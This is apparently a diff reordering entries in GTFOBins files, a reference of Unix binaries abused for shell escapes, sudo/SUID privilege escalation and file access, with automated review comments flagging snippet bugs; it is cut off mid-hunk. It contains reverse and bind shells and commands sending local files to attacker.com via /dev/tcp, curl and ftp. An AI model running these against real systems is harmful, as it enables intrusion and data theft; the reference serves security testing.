diff --git a/_gtfobins/ash.md b/_gtfobins/ash.md
index eb597b6..0656272 100644
--- a/_gtfobins/ash.md
+++ b/_gtfobins/ash.md
@@ -1,13 +1,13 @@
 ---
 functions:
 execute-interactive:
- - code: ash
- sudo-enabled:
- - code: sudo ash
- suid-enabled:
- - code: ./ash
+ - code: ash
 file-write:
- - code: |
- export LFILE=file_to_write
- ash -c 'echo data > $LFILE'
+ - code: |
+ export LFILE=file_to_write
+ ash -c 'echo data > $LFILE'
+ suid-enabled:
+ - code: "./ash"
+ sudo-enabled:
+ - code: sudo ash
 ---
diff --git a/_gtfobins/awk.md b/_gtfobins/awk.md
index 6782a72..90da062 100644
--- a/_gtfobins/awk.md
+++ b/_gtfobins/awk.md
@@ -1,34 +1,34 @@
 ---
 functions:
 execute-interactive:
- - code: awk 'BEGIN {system("/bin/sh")}'
- sudo-enabled:
- - code: sudo awk 'BEGIN {system("/bin/sh")}'
- suid-limited:
- - code: ./awk 'BEGIN {system("/bin/sh")}'
+ - code: awk 'BEGIN {system("/bin/sh")}'
 reverse-shell-non-interactive:
- - description: Run `nc -l -p 12345` on the attacker box to receive the shell.
- code: |
- RHOST=attacker.com
- RPORT=12345
- awk -v RHOST=$RHOST -v RPORT=$RPORT 'BEGIN {
- s = "/inet/tcp/0/" RHOST "/" RPORT;
- while (1) {printf "> " |& s; if ((s |& getline c) <= 0) break;
- while (c && (c |& getline) > 0) print $0 |& s; close(c)}}'
+ - description: Run `nc -l -p 12345` on the attacker box to receive the shell.
+ code: |
+ RHOST=attacker.com
+ RPORT=12345
+ awk -v RHOST=$RHOST -v RPORT=$RPORT 'BEGIN {
+ s = "/inet/tcp/0/" RHOST "/" RPORT;
+ while (1) {printf "> " |& s; if ((s |& getline c) <= 0) break;
+ while (c && (c |& getline) > 0) print $0 |& s; close(c)}}'
 bind-shell-non-interactive:
- - description: Run `nc target.com 12345` on the attacker box to connect to the shell.
- code: |
- LPORT=12345
- awk -v LPORT=$LPORT 'BEGIN {
- s = "/inet/tcp/" LPORT "/0/0";
- while (1) {printf "> " |& s; if ((s |& getline c) <= 0) break;
- while (c && (c |& getline) > 0) print $0 |& s; close(c)}}'
- file-read:
- - code: |
- LFILE=file_to_read
- awk '//' "$LFILE"
+ - description: Run `nc target.com 12345` on the attacker box to connect to the shell.
+ code: |
+ LPORT=12345
+ awk -v LPORT=$LPORT 'BEGIN {
+ s = "/inet/tcp/" LPORT "/0/0";
+ while (1) {printf "> " |& s; if ((s |& getline c) <= 0) break;
+ while (c && (c |& getline) > 0) print $0 |& s; close(c)}}'
 file-write:
- - code: |
- LFILE=file_to_write
- awk -v LFILE=$LFILE 'BEGIN { print "data" > LFILE }'
+ - code: |
+ LFILE=file_to_write
+ awk -v LFILE=$LFILE 'BEGIN { print "data" > LFILE }'
+ file-read:
+ - code: |
+ LFILE=file_to_read
+ awk '//' "$LFILE"
+ sudo-enabled:
+ - code: sudo awk 'BEGIN {system("/bin/sh")}'
+ suid-limited:
+ - code: ./awk 'BEGIN {system("/bin/sh")}'
 ---
diff --git a/_gtfobins/base64.md b/_gtfobins/base64.md
index 2dd7844..76f8551 100644
--- a/_gtfobins/base64.md
+++ b/_gtfobins/base64.md
@@ -1,15 +1,15 @@
 ---
 functions:
- sudo-enabled:
- - code: |
- LFILE=file_to_read
- sudo base64 "$LFILE" | base64 --decode
- suid-enabled:
- - code: |
- LFILE=file_to_read
- ./base64 "$LFILE" | base64 --decode
 file-read:
- - code: |
- LFILE=file_to_read
- base64 "$LFILE" | base64 --decode
+ - code: |
+ LFILE=file_to_read
+ base64 "$LFILE" | base64 --decode
+ suid-enabled:
+ - code: |
+ LFILE=file_to_read
+ ./base64 "$LFILE" | base64 --decode
+ sudo-enabled:
+ - code: |
+ LFILE=file_to_read
+ sudo base64 "$LFILE" | base64 --decode
 ---
diff --git a/_gtfobins/bash.md b/_gtfobins/bash.md
index 0b67c26..5665958 100644
--- a/_gtfobins/bash.md
+++ b/_gtfobins/bash.md
@@ -1,52 +1,55 @@
 ---
 functions:
 execute-interactive:
- - code: bash
- sudo-enabled:
- - code: sudo bash
- suid-enabled:
- - code: ./bash -p
- upload:
- - description: Send local file in the body of an HTTP POST request. Run an HTTP service on the attacker box to collect the file.
- code: |
- export RHOST=attacker.com
- export RPORT=12345
- export LFILE=file_to_send
- bash -c 'echo -e "POST / HTTP/0.9\n\n$(<$LFILE)" > /dev/tcp/$RHOST/$RPORT'
- - description: Send local file using a TCP connection. Run `nc -l -p 12345 > "file_to_save"` on the attacker box to collect the file.
- code: |
- export RHOST=attacker.com
- export RPORT=12345
- export LFILE=file_to_send
- bash -c 'cat $LFILE > /dev/tcp/$RHOST/$RPORT'
- download:
- - description: Fetch a remote file via HTTP GET request.
- code: |
- export RHOST=attacker.com
- export RPORT=12345
- export LFILE=file_to_get
- bash -c '{ echo -ne "GET /$LFILE HTTP/1.0\r\nhost: $RHOST\r\n\r\n" 1>&3; cat 0<&3; } \
- 3<>/dev/tcp/$RHOST/$RPORT \
- | { while read -r; do [ "$REPLY" = "$(echo -ne "\r")" ] && break; done; cat; } > $LFILE'
- - description: Fetch remote file using a TCP connection. Run `nc -l -p 12345 < "file_to_send"` on the attacker box to send the file.
- code: |
- export RHOST=attacker.com
- export RPORT=12345
- export LFILE=file_to_get
- bash -c 'cat < /dev/tcp/$RHOST/$RPORT > $LFILE'
+ - code: bash
 reverse-shell-interactive:
- - description: Run `nc -l -p 12345` on the attacker box to receive the shell.
- code: |
- export RHOST=attacker.com
- export RPORT=12345
- bash -c 'bash -i >& /dev/tcp/$RHOST/$RPORT 0>&1'
- file-read:
- - description: It trims trailing newlines and it's not binary-safe.
- code: |
- export LFILE=file_to_read
- bash -c 'echo "$(<$LFILE)"'
+ - description: Run `nc -l -p 12345` on the attacker box to receive the shell.
+ code: |
+ export RHOST=attacker.com
+ export RPORT=12345
+ bash -c 'bash -i >& /dev/tcp/$RHOST/$RPORT 0>&1'
+ upload:
+ - description: Send local file in the body of an HTTP POST request. Run an HTTP
+ service on the attacker box to collect the file.
+ code: |
+ export RHOST=attacker.com
+ export RPORT=12345
+ export LFILE=file_to_send
+ bash -c 'echo -e "POST / HTTP/0.9\n\n$(<$LFILE)" > /dev/tcp/$RHOST/$RPORT'
+ - description: Send local file using a TCP connection. Run `nc -l -p 12345 > "file_to_save"`
+ on the attacker box to collect the file.
+ code: |
+ export RHOST=attacker.com
+ export RPORT=12345
+ export LFILE=file_to_send
+ bash -c 'cat $LFILE > /dev/tcp/$RHOST/$RPORT'
+ download:
+ - description: Fetch a remote file via HTTP GET request.
+ code: |
+ export RHOST=attacker.com
+ export RPORT=12345
+ export LFILE=file_to_get
+ bash -c '{ echo -ne "GET /$LFILE HTTP/1.0\r\nhost: $RHOST\r\n\r\n" 1>&3; cat 0<&3; } \
+ 3<>/dev/tcp/$RHOST/$RPORT \
+ | { while read -r; do [ "$REPLY" = "$(echo -ne "\r")" ] && break; done; cat; } > $LFILE'
+ - description: Fetch remote file using a TCP connection. Run `nc -l -p 12345 < "file_to_send"`
+ on the attacker box to send the file.
+ code: |
+ export RHOST=attacker.com
+ export RPORT=12345
+ export LFILE=file_to_get
+ bash -c 'cat < /dev/tcp/$RHOST/$RPORT > $LFILE'
 file-write:
- - code: |
- export LFILE=file_to_write
- bash -c 'echo data > $LFILE'
+ - code: |
+ export LFILE=file_to_write
+ bash -c 'echo data > $LFILE'
+ file-read:
+ - description: It trims trailing newlines and it's not binary-safe.
+ code: |
+ export LFILE=file_to_read
+ bash -c 'echo "$(<$LFILE)"'
+ suid-enabled:
+ - code: "./bash -p"
+ sudo-enabled:
+ - code: sudo bash
 ---
diff --git a/_gtfobins/busybox.md b/_gtfobins/busybox.md
index c1eac8f..7e387bb 100644
--- a/_gtfobins/busybox.md
+++ b/_gtfobins/busybox.md
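Review bot: The `upload` HTTP POST snippet on the new side builds the request body with `$(<$LFILE)`, the same construct that the `file-read` entry later in this hunk documents as "It trims trailing newlines and it's not binary-safe", yet the upload description says nothing about it. Add the same caveat to that description, e.g. append `It trims trailing newlines and it's not binary-safe.` after "to collect the file.". The ksh hunk further down has the same gap: its upload snippet uses `$(cat $LFILE)`, which likewise strips trailing newlines.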
@@ -4,23 +4,24 @@ description: |
 what GTFBins binaries are supported. Here some example.
 functions:
 execute-interactive:
- - code: busybox sh
- sudo-enabled:
- - code: sudo busybox sh
- suid-enabled:
- - description: It may drop the SUID privileges depending on the compilation flags and the runtime configuration.
- code: ./busybox sh
- file-read:
- - code: |
- LFILE=file_to_read
- ./busybox cat "$LFILE"
- file-write:
- - code: |
- LFILE=file_to_write
- busybox sh -c 'echo "data" > $LFILE'
+ - code: busybox sh
 upload:
- - description: Serve files in the local folder running an HTTP server.
- code: |
- export LPORT=12345
- busybox httpd -f -p $LPORT -h .
+ - description: Serve files in the local folder running an HTTP server.
+ code: |
+ export LPORT=12345
+ busybox httpd -f -p $LPORT -h .
+ file-write:
+ - code: |
+ LFILE=file_to_write
+ busybox sh -c 'echo "data" > $LFILE'
+ file-read:
+ - code: |
+ LFILE=file_to_read
+ ./busybox cat "$LFILE"
+ suid-enabled:
+ - description: It may drop the SUID privileges depending on the compilation flags
+ and the runtime configuration.
+ code: "./busybox sh"
+ sudo-enabled:
+ - code: sudo busybox sh
 ---
diff --git a/_gtfobins/cat.md b/_gtfobins/cat.md
index da1e242..0278a57 100644
--- a/_gtfobins/cat.md
+++ b/_gtfobins/cat.md
@@ -1,15 +1,15 @@
 ---
 functions:
- sudo-enabled:
- - code: |
- LFILE=file_to_read
- sudo cat "$LFILE"
- suid-enabled:
- - code: |
- LFILE=file_to_read
- ./cat "$LFILE"
 file-read:
- - code: |
- LFILE=file_to_read
- cat "$LFILE"
+ - code: |
+ LFILE=file_to_read
+ cat "$LFILE"
+ suid-enabled:
+ - code: |
+ LFILE=file_to_read
+ ./cat "$LFILE"
+ sudo-enabled:
+ - code: |
+ LFILE=file_to_read
+ sudo cat "$LFILE"
 ---
diff --git a/_gtfobins/csh.md b/_gtfobins/csh.md
index aa5b1e3..e37cb53 100644
--- a/_gtfobins/csh.md
+++ b/_gtfobins/csh.md
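Review bot: The `file-read` entry on the new side of busybox.md runs `./busybox cat "$LFILE"`, while every other non-SUID entry in this hunk (`busybox sh`, `busybox sh -c ...`, `busybox httpd ...`) uses the bare binary name and the `./` form is what the `suid-enabled` entry uses; this looks like a copy-and-paste leftover that the reorder carries along. Unless the relative path is intended here, change the line to `busybox cat "$LFILE"`.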
@@ -1,13 +1,13 @@
 ---
 functions:
 execute-interactive:
- - code: csh
- sudo-enabled:
- - code: sudo csh
- suid-enabled:
- - code: ./csh -b
+ - code: csh
 file-write:
- - code: |
- export LFILE=file_to_write
- ash -c 'echo data > $LFILE'
+ - code: |
+ export LFILE=file_to_write
+ ash -c 'echo data > $LFILE'
+ suid-enabled:
+ - code: "./csh -b"
+ sudo-enabled:
+ - code: sudo csh
 ---
diff --git a/_gtfobins/curl.md b/_gtfobins/curl.md
index c14cc1b..3ad8be7 100644
--- a/_gtfobins/curl.md
+++ b/_gtfobins/curl.md
@@ -1,20 +1,21 @@
 ---
 functions:
 upload:
- - description: Send local file with an HTTP POST request. Run an HTTP service on the attacker box to collect the file.
- code: |
- URL=http://attacker.com/
- LFILE=file_to_send
- curl -X POST -d @$file_to_send $URL
+ - description: Send local file with an HTTP POST request. Run an HTTP service on
+ the attacker box to collect the file.
+ code: |
+ URL=http://attacker.com/
+ LFILE=file_to_send
+ curl -X POST -d @$file_to_send $URL
 download:
- - description: Fetch a remote file via HTTP GET request.
- code: |
- URL=http://attacker.com/file_to_get
- LFILE=file_to_save
- curl $URL -o $LFILE
+ - description: Fetch a remote file via HTTP GET request.
+ code: |
+ URL=http://attacker.com/file_to_get
+ LFILE=file_to_save
+ curl $URL -o $LFILE
 file-read:
- - description: The file path must be absolute.
- code: |
- LFILE=/tmp/file_to_read
- curl file://$LFILE
+ - description: The file path must be absolute.
+ code: |
+ LFILE=/tmp/file_to_read
+ curl file://$LFILE
 ---
diff --git a/_gtfobins/cut.md b/_gtfobins/cut.md
index ec0bce8..8c255b9 100644
--- a/_gtfobins/cut.md
+++ b/_gtfobins/cut.md
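Review bot: The `file-write` snippet on the new side of csh.md still runs `ash -c 'echo data > $LFILE'`, so it exercises ash rather than csh; it looks copied from ash.md and the reorder carries it over unchanged. The line should be `csh -c 'echo data > $LFILE'`. The same copy sits in dash.md's `file-write` entry in the next hunk, where it should read `dash -c 'echo data > $LFILE'`.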
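Review bot: The `upload` snippet in curl.md assigns `LFILE=file_to_send` but then passes `-d @$file_to_send`, which expands an unset variable, so curl never reads the file the previous line names; the re-indented new side keeps the mismatch. Change the last line to `curl -X POST -d @$LFILE $URL`.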
@@ -1,15 +1,15 @@
 ---
 functions:
- sudo-enabled:
- - code: |
- LFILE=file_to_read
- sudo cut -d "" -f1 "$LFILE"
- suid-enabled:
- - code: |
- LFILE=file_to_read
- ./cut -d "" -f1 "$LFILE"
 file-read:
- - code: |
- LFILE=file_to_read
- cut -d "" -f1 "$LFILE"
+ - code: |
+ LFILE=file_to_read
+ cut -d "" -f1 "$LFILE"
+ suid-enabled:
+ - code: |
+ LFILE=file_to_read
+ ./cut -d "" -f1 "$LFILE"
+ sudo-enabled:
+ - code: |
+ LFILE=file_to_read
+ sudo cut -d "" -f1 "$LFILE"
 ---
diff --git a/_gtfobins/dash.md b/_gtfobins/dash.md
index 0e61b02..724a3dc 100644
--- a/_gtfobins/dash.md
+++ b/_gtfobins/dash.md
@@ -1,13 +1,13 @@
 ---
 functions:
 execute-interactive:
- - code: dash
- sudo-enabled:
- - code: sudo dash
- suid-enabled:
- - code: ./dash -p
+ - code: dash
 file-write:
- - code: |
- export LFILE=file_to_write
- ash -c 'echo data > $LFILE'
+ - code: |
+ export LFILE=file_to_write
+ ash -c 'echo data > $LFILE'
+ suid-enabled:
+ - code: "./dash -p"
+ sudo-enabled:
+ - code: sudo dash
 ---
diff --git a/_gtfobins/dd.md b/_gtfobins/dd.md
index a34f5b7..4c8eb8d 100644
--- a/_gtfobins/dd.md
+++ b/_gtfobins/dd.md
@@ -1,11 +1,11 @@
 ---
 functions:
- file-read:
- - code: |
- LFILE=file_to_read
- dd if=LFILE
 file-write:
- - code: |
- LFILE=file_to_write
- echo "data" | dd of=$LFILE
+ - code: |
+ LFILE=file_to_write
+ echo "data" | dd of=$LFILE
+ file-read:
+ - code: |
+ LFILE=file_to_read
+ dd if=LFILE
 ---
diff --git a/_gtfobins/diff.md b/_gtfobins/diff.md
index 77ad8b6..0fc0308 100644
--- a/_gtfobins/diff.md
+++ b/_gtfobins/diff.md
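Review bot: The `file-read` snippet in dd.md sets `LFILE=file_to_read` but then runs `dd if=LFILE` without the `$`, so dd opens a file literally named `LFILE`; the reorder keeps the typo on the new side. The line should be `dd if=$LFILE`, matching the `dd of=$LFILE` form used in the `file-write` entry above it.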
@@ -1,15 +1,15 @@
 ---
 functions:
- sudo-enabled:
- - code: |
- LFILE=file_to_read
- sudo diff --line-format=%L /dev/null $LFILE
- suid-enabled:
- - code: |
- LFILE=file_to_read
- ./diff --line-format=%L /dev/null $LFILE
 file-read:
- - code: |
- LFILE=file_to_read
- diff --line-format=%L /dev/null $LFILE
+ - code: |
+ LFILE=file_to_read
+ diff --line-format=%L /dev/null $LFILE
+ suid-enabled:
+ - code: |
+ LFILE=file_to_read
+ ./diff --line-format=%L /dev/null $LFILE
+ sudo-enabled:
+ - code: |
+ LFILE=file_to_read
+ sudo diff --line-format=%L /dev/null $LFILE
 ---
diff --git a/_gtfobins/ed.md b/_gtfobins/ed.md
index 2d9dc16..9683b83 100644
--- a/_gtfobins/ed.md
+++ b/_gtfobins/ed.md
@@ -1,22 +1,23 @@
 ---
 functions:
 execute-interactive:
- - code: |
- ed
- !/bin/sh
- sudo-enabled:
- - code: |
- sudo ed
- !/bin/sh
- suid-limited:
- - code: |
- ./ed
- !/bin/sh
- file-read:
- - code: |
- ed file_to_read
+ - code: |
+ ed
+ !/bin/sh
 file-write:
- - code: |
- ed file_to_write
- w
+ - code: |
+ ed file_to_write
+ w
+ file-read:
+ - code: 'ed file_to_read
+
+'
+ sudo-enabled:
+ - code: |
+ sudo ed
+ !/bin/sh
+ suid-limited:
+ - code: |
+ ./ed
+ !/bin/sh
 ---
diff --git a/_gtfobins/emacs.md b/_gtfobins/emacs.md
index 7750506..d758d40 100644
--- a/_gtfobins/emacs.md
+++ b/_gtfobins/emacs.md
@@ -1,16 +1,17 @@
 ---
 functions:
 execute-interactive:
- - code: emacs -Q -nw --eval '(term "/bin/sh")'
- sudo-enabled:
- - code: sudo emacs -Q -nw --eval '(term "/bin/sh")'
- suid-enabled:
- - code: ./emacs -Q -nw --eval '(term "/bin/sh -p")'
- file-read:
- - code: |
- emacs file_to_read
+ - code: emacs -Q -nw --eval '(term "/bin/sh")'
 file-write:
- - code: |
- emacs file_to_write
- C-x C-s
+ - code: |
+ emacs file_to_write
+ C-x C-s
+ file-read:
+ - code: 'emacs file_to_read
+
+'
+ suid-enabled:
+ - code: ./emacs -Q -nw --eval '(term "/bin/sh -p")'
+ sudo-enabled:
+ - code: sudo emacs -Q -nw --eval '(term "/bin/sh")'
 ---
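Review bot: The re-serialized `file-read` entry in ed.md now reads `- code: 'ed file_to_read`, an empty line and `'` — a multi-line single-quoted scalar that parses to the same `ed file_to_read` plus newline as the old `|` block, but is much harder to read and edit by hand. Prefer keeping the literal block style, i.e. `- code: |` followed by `ed file_to_read`, and configure the emitter that produced this reordering to keep `|` for multi-line strings. The same quoted form appears in the emacs hunk just below and in the expand, fmt, less, man, more, nano, nl and node hunks (more.md additionally gets `"./more file_to_read\n"`).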
diff --git a/_gtfobins/env.md b/_gtfobins/env.md
index e0b5368..71b1e78 100644
--- a/_gtfobins/env.md
+++ b/_gtfobins/env.md
@@ -1,9 +1,9 @@
 ---
 functions:
 execute-interactive:
- - code: env /bin/sh
- sudo-enabled:
- - code: sudo env /bin/sh
+ - code: env /bin/sh
 suid-enabled:
- - code: ./env /bin/sh -p
+ - code: "./env /bin/sh -p"
+ sudo-enabled:
+ - code: sudo env /bin/sh
 ---
diff --git a/_gtfobins/expand.md b/_gtfobins/expand.md
index a13ca84..8ff7fbd 100644
--- a/_gtfobins/expand.md
+++ b/_gtfobins/expand.md
@@ -1,17 +1,18 @@
 ---
-description: |
- The read file content is corrupted by replacing tabs with spaces.
+description: 'The read file content is corrupted by replacing tabs with spaces.
+
+'
 functions:
- sudo-enabled:
- - code: |
- LFILE=file_to_read
- sudo expand "$LFILE"
- suid-enabled:
- - code: |
- LFILE=file_to_read
- ./expand "$LFILE"
 file-read:
- - code: |
- LFILE=file_to_read
- expand "$LFILE"
+ - code: |
+ LFILE=file_to_read
+ expand "$LFILE"
+ suid-enabled:
+ - code: |
+ LFILE=file_to_read
+ ./expand "$LFILE"
+ sudo-enabled:
+ - code: |
+ LFILE=file_to_read
+ sudo expand "$LFILE"
 ---
diff --git a/_gtfobins/expect.md b/_gtfobins/expect.md
index 421084a..3e9602b 100644
--- a/_gtfobins/expect.md
+++ b/_gtfobins/expect.md
@@ -1,9 +1,9 @@
 ---
 functions:
 execute-interactive:
- - code: expect -c 'spawn /bin/sh;interact'
- sudo-enabled:
- - code: sudo expect -c 'spawn /bin/sh;interact'
+ - code: expect -c 'spawn /bin/sh;interact'
 suid-enabled:
- - code: ./expect -c 'spawn /bin/sh -p;interact'
+ - code: "./expect -c 'spawn /bin/sh -p;interact'"
+ sudo-enabled:
+ - code: sudo expect -c 'spawn /bin/sh;interact'
 ---
diff --git a/_gtfobins/find.md b/_gtfobins/find.md
index 2305f6b..fc1386a 100644
--- a/_gtfobins/find.md
+++ b/_gtfobins/find.md
@@ -1,9 +1,9 @@
 ---
 functions:
 execute-interactive:
- - code: find . -exec /bin/sh \; -quit
- sudo-enabled:
- - code: sudo find . -exec /bin/sh \; -quit
+ - code: find . -exec /bin/sh \; -quit
 suid-enabled:
- - code: ./find . -exec /bin/sh -p \; -quit
+ - code: "./find . -exec /bin/sh -p \\; -quit"
+ sudo-enabled:
+ - code: sudo find . -exec /bin/sh \; -quit
 ---
diff --git a/_gtfobins/flock.md b/_gtfobins/flock.md
index da940ed..28a0ec3 100644
--- a/_gtfobins/flock.md
+++ b/_gtfobins/flock.md
@@ -1,9 +1,9 @@
 ---
 functions:
 execute-interactive:
- - code: flock -u / /bin/sh
- sudo-enabled:
- - code: sudo flock -u / /bin/sh
+ - code: flock -u / /bin/sh
 suid-enabled:
- - code: ./flock -u / /bin/sh -p
+ - code: "./flock -u / /bin/sh -p"
+ sudo-enabled:
+ - code: sudo flock -u / /bin/sh
 ---
diff --git a/_gtfobins/fmt.md b/_gtfobins/fmt.md
index 028e561..79b69ac 100644
--- a/_gtfobins/fmt.md
+++ b/_gtfobins/fmt.md
@@ -1,17 +1,18 @@
 ---
-description: |
- The read file content is not binary-safe.
+description: 'The read file content is not binary-safe.
+
+'
 functions:
- sudo-enabled:
- - code: |
- LFILE=file_to_read
- sudo fmt -pNON_EXISTING_PREFIX "$LFILE"
- suid-enabled:
- - code: |
- LFILE=file_to_read
- ./fmt -pNON_EXISTING_PREFIX "$LFILE"
 file-read:
- - code: |
- LFILE=file_to_read
- fmt -pNON_EXISTING_PREFIX "$LFILE"
+ - code: |
+ LFILE=file_to_read
+ fmt -pNON_EXISTING_PREFIX "$LFILE"
+ suid-enabled:
+ - code: |
+ LFILE=file_to_read
+ ./fmt -pNON_EXISTING_PREFIX "$LFILE"
+ sudo-enabled:
+ - code: |
+ LFILE=file_to_read
+ sudo fmt -pNON_EXISTING_PREFIX "$LFILE"
 ---
diff --git a/_gtfobins/fold.md b/_gtfobins/fold.md
index 275b96c..cf98e21 100644
--- a/_gtfobins/fold.md
+++ b/_gtfobins/fold.md
@@ -1,15 +1,15 @@
 ---
 functions:
- sudo-enabled:
- - code: |
- LFILE=file_to_read
- sudo fold -w99999999 "$LFILE"
- suid-enabled:
- - code: |
- LFILE=file_to_read
- ./fold -w99999999 "$LFILE"
 file-read:
- - code: |
- LFILE=file_to_read
- fold -w99999999 "$LFILE"
+ - code: |
+ LFILE=file_to_read
+ fold -w99999999 "$LFILE"
+ suid-enabled:
+ - code: |
+ LFILE=file_to_read
+ ./fold -w99999999 "$LFILE"
+ sudo-enabled:
+ - code: |
+ LFILE=file_to_read
+ sudo fold -w99999999 "$LFILE"
 ---
diff --git a/_gtfobins/ftp.md b/_gtfobins/ftp.md
index c8647d6..c80f99a 100644
--- a/_gtfobins/ftp.md
+++ b/_gtfobins/ftp.md
@@ -1,23 +1,23 @@
 ---
 functions:
 execute-interactive:
- - code: |
- ftp
- !/bin/sh
- sudo-enabled:
- - code: |
- sudo ftp
- !/bin/sh
+ - code: |
+ ftp
+ !/bin/sh
 upload:
- - description: Send local file to a FTP server.
- code: |
- RHOST=attacker.com
- ftp $RHOST
- put file_to_send
+ - description: Send local file to a FTP server.
+ code: |
+ RHOST=attacker.com
+ ftp $RHOST
+ put file_to_send
 download:
- - description: Fetch a remote file from a FTP server.
- code: |
- RHOST=attacker.com
- ftp $RHOST
- get file_to_get
+ - description: Fetch a remote file from a FTP server.
+ code: |
+ RHOST=attacker.com
+ ftp $RHOST
+ get file_to_get
+ sudo-enabled:
+ - code: |
+ sudo ftp
+ !/bin/sh
 ---
diff --git a/_gtfobins/gdb.md b/_gtfobins/gdb.md
index d8f60b9..413739b 100644
--- a/_gtfobins/gdb.md
+++ b/_gtfobins/gdb.md
@@ -7,11 +7,11 @@ description: |
 [version 3](/gtfobins/python3/).
 functions:
 execute-interactive:
- - code: gdb -nx -ex '!sh' -ex quit
- sudo-enabled:
- - code: sudo gdb -nx -ex '!sh' -ex quit
+ - code: gdb -nx -ex '!sh' -ex quit
 file-write:
- - code: |
- LFILE=file_to_write
- gdb -nx -ex "dump value $LFILE \"data\"" -ex quit
+ - code: |
+ LFILE=file_to_write
+ gdb -nx -ex "dump value $LFILE \"data\"" -ex quit
+ sudo-enabled:
+ - code: sudo gdb -nx -ex '!sh' -ex quit
 ---
diff --git a/_gtfobins/head.md b/_gtfobins/head.md
index e124d68..00a98a5 100644
--- a/_gtfobins/head.md
+++ b/_gtfobins/head.md
@@ -1,15 +1,15 @@
 ---
 functions:
- sudo-enabled:
- - code: |
- LFILE=file_to_read
- sudo head -c1G "$LFILE"
- suid-enabled:
- - code: |
- LFILE=file_to_read
- ./head -c1G "$LFILE"
 file-read:
- - code: |
- LFILE=file_to_read
- head -c1G "$LFILE"
+ - code: |
+ LFILE=file_to_read
+ head -c1G "$LFILE"
+ suid-enabled:
+ - code: |
+ LFILE=file_to_read
+ ./head -c1G "$LFILE"
+ sudo-enabled:
+ - code: |
+ LFILE=file_to_read
+ sudo head -c1G "$LFILE"
 ---
diff --git a/_gtfobins/ionice.md b/_gtfobins/ionice.md
index 6866485..4582300 100644
--- a/_gtfobins/ionice.md
+++ b/_gtfobins/ionice.md
@@ -1,9 +1,9 @@
 ---
 functions:
 execute-interactive:
- - code: ionice /bin/sh
- sudo-enabled:
- - code: sudo ionice /bin/sh
+ - code: ionice /bin/sh
 suid-enabled:
- - code: ./ionice /bin/sh -p
+ - code: "./ionice /bin/sh -p"
+ sudo-enabled:
+ - code: sudo ionice /bin/sh
 ---
diff --git a/_gtfobins/jq.md b/_gtfobins/jq.md
index cc22b9c..c894c84 100644
--- a/_gtfobins/jq.md
+++ b/_gtfobins/jq.md
@@ -1,15 +1,15 @@
 ---
 functions:
- sudo-enabled:
- - code: |
- LFILE=file_to_read
- sudo jq -Rr . "$LFILE"
- suid-enabled:
- - code: |
- LFILE=file_to_read
- ./jq -Rr . "$LFILE"
 file-read:
- - code: |
- LFILE=file_to_read
- jq -Rr . "$LFILE"
+ - code: |
+ LFILE=file_to_read
+ jq -Rr . "$LFILE"
+ suid-enabled:
+ - code: |
+ LFILE=file_to_read
+ ./jq -Rr . "$LFILE"
+ sudo-enabled:
+ - code: |
+ LFILE=file_to_read
+ sudo jq -Rr . "$LFILE"
 ---
diff --git a/_gtfobins/ksh.md b/_gtfobins/ksh.md
index 7386e3f..1ebc62f 100644
--- a/_gtfobins/ksh.md
+++ b/_gtfobins/ksh.md
@@ -1,56 +1,59 @@
 ---
 functions:
 execute-interactive:
- - code: ksh
- sudo-enabled:
- - code: sudo ksh
- suid-enabled:
- - code: ./ksh -p
- upload:
- - description: Send local file in the body of an HTTP POST request. Run an HTTP service on the attacker box to collect the file.
- code: |
- export RHOST=attacker.com
- export RPORT=12345
- export LFILE=file_to_send
- ksh -c 'echo -e "POST / HTTP/0.9\n\n$(cat $LFILE)" > /dev/tcp/$RHOST/$RPORT'
- - description: Send local file using a TCP connection. Run `nc -l -p 12345 > "file_to_save"` on the attacker box to collect the file.
- code: |
- export RHOST=attacker.com
- export RPORT=12345
- export LFILE=file_to_send
- ksh -c 'cat $LFILE > /dev/tcp/$RHOST/$RPORT'
- download:
- - description: Fetch a remote file via HTTP GET request.
- code: |
- export RHOST=attacker.com
- export RPORT=12345
- export LFILE=file_to_get
- ksh -c '{ echo -ne "GET /$LFILE HTTP/1.0\r\nhost: $RHOST\r\n\r\n" 1>&3; cat 0<&3; } \
- 3<>/dev/tcp/$RHOST/$RPORT \
- | { while read -r; do [ "$REPLY" = "$(echo -ne "\r")" ] && break; done; cat; } > $LFILE'
- - description: Fetch remote file using a TCP connection. Run `nc -l -p 12345 < "file_to_send"` on the attacker box to send the file.
- code: |
- export RHOST=attacker.com
- export RPORT=12345
- export LFILE=file_to_get
- ksh -c 'cat < /dev/tcp/$RHOST/$RPORT > $LFILE'
+ - code: ksh
 reverse-shell-interactive:
- - description: Run `nc -l -p 12345` on the attacker box to receive the shell.
- code: |
- export RHOST=attacker.com
- export RPORT=12345
- ksh -c 'ksh -i > /dev/tcp/$RHOST/$RPORT 2>&1 0>&1'
- file-read:
- - description: It trims trailing newlines.
- code: |
- export LFILE=file_to_read
- ksh -c 'echo "$(<$LFILE)"'
- - description: It trims trailing newlines.
- code: |
- export LFILE=file_to_read
- ksh -c $'read -r -d \x04 < "$LFILE"; echo "$REPLY"'
+ - description: Run `nc -l -p 12345` on the attacker box to receive the shell.
+ code: |
+ export RHOST=attacker.com
+ export RPORT=12345
+ ksh -c 'ksh -i > /dev/tcp/$RHOST/$RPORT 2>&1 0>&1'
+ upload:
+ - description: Send local file in the body of an HTTP POST request. Run an HTTP
+ service on the attacker box to collect the file.
+ code: |
+ export RHOST=attacker.com
+ export RPORT=12345
+ export LFILE=file_to_send
+ ksh -c 'echo -e "POST / HTTP/0.9\n\n$(cat $LFILE)" > /dev/tcp/$RHOST/$RPORT'
+ - description: Send local file using a TCP connection. Run `nc -l -p 12345 > "file_to_save"`
+ on the attacker box to collect the file.
+ code: |
+ export RHOST=attacker.com
+ export RPORT=12345
+ export LFILE=file_to_send
+ ksh -c 'cat $LFILE > /dev/tcp/$RHOST/$RPORT'
+ download:
+ - description: Fetch a remote file via HTTP GET request.
+ code: |
+ export RHOST=attacker.com
+ export RPORT=12345
+ export LFILE=file_to_get
+ ksh -c '{ echo -ne "GET /$LFILE HTTP/1.0\r\nhost: $RHOST\r\n\r\n" 1>&3; cat 0<&3; } \
+ 3<>/dev/tcp/$RHOST/$RPORT \
+ | { while read -r; do [ "$REPLY" = "$(echo -ne "\r")" ] && break; done; cat; } > $LFILE'
+ - description: Fetch remote file using a TCP connection. Run `nc -l -p 12345 < "file_to_send"`
+ on the attacker box to send the file.
+ code: |
+ export RHOST=attacker.com
+ export RPORT=12345
+ export LFILE=file_to_get
+ ksh -c 'cat < /dev/tcp/$RHOST/$RPORT > $LFILE'
 file-write:
- - code: |
- export LFILE=file_to_write
